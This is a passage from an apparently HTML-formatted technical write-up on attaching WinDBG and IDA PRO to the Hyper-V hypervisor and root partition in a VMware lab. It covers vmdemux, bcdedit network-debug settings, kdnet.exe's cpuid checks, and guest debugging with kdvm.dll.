<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">- Run vmdemux (located in the Setup directory of WinDBG), specifying the name of the port as one of the parameters:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">vmdemux.exe -src com:port=com2,baud=115200</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In case of a successful connection we get:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="237" src="https://lh5.googleusercontent.com/SXDY6b_X8szqh0WBTznRRk5IR1m-msaYHC7iFOMa863gA0l2mXde-SqUBoQtZ3tX4cT94kdr0QVG8peSkDv2cfG0GFXJUuaYJb2EukYvO3UB2hT29x6gLSxXBoDRDwbxyUZ_Ee92vx9il9MW" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="462" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You created a named pipe \\.\pipe\Vm1 must be used to attach the debugger:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WinDBG.exe -b -k com:port=\\.\pipe\Vm1,pipe,reconnect,resets=0</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">At the same time the debugger connects to the root-partition. Then you need to execute <b>g</b> command several times, then vmdemux shall issue:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="231" src="https://lh3.googleusercontent.com/cq0jJj4r9kqiSw3TVgqqvZe7kVgwdBQHbWQMao3lm4RHul50HOJDoMUAR3Gp53cporLs1-01ExvXUb6SuelOuHjRlg-ZAw_BakpYv1kqeC2g4UQRoo9EyyohQkVkx_4V0gKymixp9ChTOI0f" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="450" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After that, with the help of IDA PRO, you can connect directly to the hypervisor via a named pipe \\.\Pipe\Vm0, choosing as WinDBG debugger and specifying process options in the connection string:</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">com:port=\\.\pipe\Vm0,pipe,resets = 0</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In case the following message appears choose </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Same</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="144" src="https://lh5.googleusercontent.com/GGhZ6Hn-QliK41MbxedjxLTu5hSOcQP1djrBr3Djv1cOMwAqzJRLNcS4jtKy3P5-JNL-Br-vCc8YDebaYN6MWN_K9DrOMZShC7F8omf1yavHOXAnmqTdA2kmlHPZBzed5C_jdPuQjnGbwMYi" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="435" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The debugger will stop within the hypervisor:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="108" src="https://lh5.googleusercontent.com/RmOBae1XCH5PMBZ5dIyvo3IGlWUZhHfzxGjMGcK5p0H3ncEvzIgREQlQpGVciJ_v-qoQiOUFIThcppM152Typ3Pq1rRshN88jBxoV9ygSTPIRJTYZPgC0mwF4dUFounK1cvE3WKEEN4EtyKx" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="459" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">As we see in comparing with Windows Server 2012 (R2) there is new module – kdstub.dll. Early version of hypervisor have static link with debug library and huge size of file (2-3Mb), size of current version of hvix64.exe – 932 Kb.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">On next stages kdstub.dll will be changed on appropriate debug module, f.e. kd_02_8086.dll (for network debugging):</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="116" src="https://lh3.googleusercontent.com/PXBNZr7vlXiVM-_2Lnhc87MBXiNFi7dIeAJjBQJsXKrUmGOnQ6NjuYWnZNvV4oOYn4JmlXxPEd4hAEpMsit3EabDHpSKR0YkvIJNA3X5jVzQ3cgdJTaDP3BZDbUwOEWkhiRUerD_9u6ZEgoy" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="362" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In Windows Server 2012 hypervisor and higher an opportunity to debug the network, and even on MSDN at the time the article was no description of this method, however, a little digging in to help utility </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, you can choose the options you want.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">To do this in Windows Server 2016 TP2, it is necessary to write</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bcdedit /set dbgtransport kdnet.dll</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bcdedit /debug yes</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bcdedit /dbgsettings net hostip:192.168.2.1 port:50002</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">in response, the command will display the connection string of the root - partition</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /set hypervisordebug on</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /hypervisorsettings NET HOSTIP:192.168.2.1 PORT:50000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">in response, the command will display the connection string of the hypervisor.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Inside the VMware virtual machine configuration for installing the Host Only adapter, go into the virtual network settings to configure DHCP for the adapter and make sure that Windows Server 2016 TP2 is normally assigned to this address, for example, by running the command ipconfig / renew.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then run 2 instances of IDA PRO, set the debug type to KernelMode and specify the </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Process Option->Connection string </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">to the following line from the command above:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">net:port=50002,Key=pv1l8rzwhxhz.2vpkq86oc8zwg.tly17iosgzm8.1h7r18svpji4p - the root partition</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">net:port=50000,Key=3fkmf6l8a1tnd.3tsxig92rw4cc.2l0dhyq3p24qj.rgbz64xkofc0 - hypervisor</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">thereby acquiring the ability to simultaneously debug root-partition and the hypervisor.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Option </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /dbgsettings nodhcp </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">allows the debugger to use network mode, use the ip-address of the root partition. In this case, configuring the DHCP in VMware is not necessary.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You can use kdnet.exe (10), which was included in Debugging Tools for Windows 10, for configuring root-partition for debugging:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kdnet.exe 192.168.2.1 50002</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You can see message “Microsoft hypervisor supports using KDNET in guest VMs”</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="148" src="https://lh6.googleusercontent.com/DtAAl-nOjCt1h2mODKa10moI9mo1LcTEknsjHslpULr6IkCq34aEScQtNizEKFFj8tHEr0Puzv1ytXKpOYhJK8UKTRtvPRmKmZ-woXPoNgPXrpJaGF0qUkm1iC9hTVjBcjL5ky-9OWwABGdL" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="462" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For checking this feature kdnet.exe:</span></div>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Detecting the presence of a Hypervisor – cpuid(1), ecx[31] must be equivalent 1.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Check Hypervisor Vendor ID Signature – cpuid (0x40000000) must return “Microsoft Hv” in ebx,ecx,edx registers.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Check Hypervisor Interface Signature – cpuid(0x40000001), eax must contains Hv#1</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Check Build Number – cpuid(0x40000002), it must be equivalent or above 0x23F0. If it below caption appears:</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.45pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The Microsoft hypervisor running this VM does not support KDNET. Please upgrade to the hypervisor shipped in Windows 8 or WS2012 or later.</span></div>
<ol start="5" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Finally execute cpuid (0x40000003) and check that ebx[12] must be 1 (it means that partition was created with CpuManagement flag)</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.45pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If all checks was passed kdnet prints message about KDNET supporting.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If you configure guest virtual machine, kdnet.exe prints additional message:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">C:\Program Files\Windows Kits\10\Debuggers\x86>kdnet 10.0.0.1 50020</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Enabling network debugging on Microsoft Hypervisor Virtual Machine.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Key=3d1uhidq70zko.3uge1t58fhyaa.2ybt7ue2dbmou.1ehlagdp52dvg</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">To finish setting up KDNET for this VM, run the following command from an</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">elevated command prompt running on the Windows hyper-v host. (NOT this VM!)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">powershell </span><a href="about:blank" style="text-decoration: none;"><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">\\dbg\privates\kdnetdebugvm.ps1</span></a><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> -vmguid DAAC9DEB-7D43-4AD3-932A-6C186</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">9EE98E4 -port 50020</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then make sure to SHUTDOWN (not restart) the VM so that the new settings will</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">take effect. Run shutdown -s -t 0 from this command prompt.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">To debug this vm, run the following command on your debugger host machine.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">windbg -k net:port=50020,key=3d1uhidq70zko.3uge1t58fhyaa.2ybt7ue2dbmou.1ehlagdp5</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">2dvg,target=SRV2016</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="206" src="https://lh5.googleusercontent.com/w3Ky0OeFKWTvXdfFAWLjIejhpdNusUB7DbNxMDB_N-YG7b1oyNceuSXRGSVMdacxv14QrAFQyhH-Hl93SF3B2_bTPC80oKKlHLsFsraDhgpN02EFEu8-RbPx1pQhrAo4RO9T81Epe_LYG82z" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="444" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">It mentions private kdnetdebugvm.ps1 script, which doesn’t present in debugger tools. KDNET.exe read vmguid from HKLM\Software\Microsoft\Virtual Machine\Guest\Parameters\VirtualMachineId key and debugging key from HKLM\BCD00000000\Objects\{4636856e-540f-4170-a130-a84776f4c654}\Elements\1200001d\Element</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Debugging the guest against Hyper-V OS can be made either by the standard method via a virtual com-port or by using the debugging capabilities of the hypervisor. An example of second variant was mentioned on OSR Online (5), and this is how you can set it up:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">- copy the file kdvm.dll from the Windows 8 directory C:\Windows\system32\kdvm.dll same goes for Windows 7 (of course, the file must be identical to the 64-bit operating system). For Windows 8.1 \ Windows Server 2012 R2 kdvm.dll must be taken from preview-build, since the RTM versions of the file has been removed. It looks like you cannot use that method on Windows Server 2016\Windows 10 OS - winload ignores “dbgtransport” with kdvm.dll parameter and load kd.dll. Yes, use standard COM-debugging!</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"></span><br /></div>
<br /><div dir="ltr" style="margin-left: -5.75pt;">
<table style="border-collapse: collapse; border-image: none; border: currentColor;"><colgroup><col width="335"></col><col width="335"></col></colgroup><tbody>
<tr style="height: 0px;"><td style="border: 1px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">winload.exe Windows 8.1 x86</span></div>
</td><td style="border: 1px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">winload.exe Windows 10 x86 (kdvm.dll is absent)</span></div>
</td></tr>
<tr style="height: 0px;"><td style="border: 1px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="290" src="https://lh6.googleusercontent.com/Sbf4porlLQSHA33FX28GtExeapeclz-3Y2T8L9QhX2wYqUwfzwT5LZ4wx0xGkvi_l1Yv5YmLjcks8x6q_iiz8POvuKLY8Xe25nf6baX44Hiq3r7OvOvfJrmkIn6Zipbsacxtm5V4qRf1K0jC" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="210" /></span></div>
</td><td style="border: 1px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
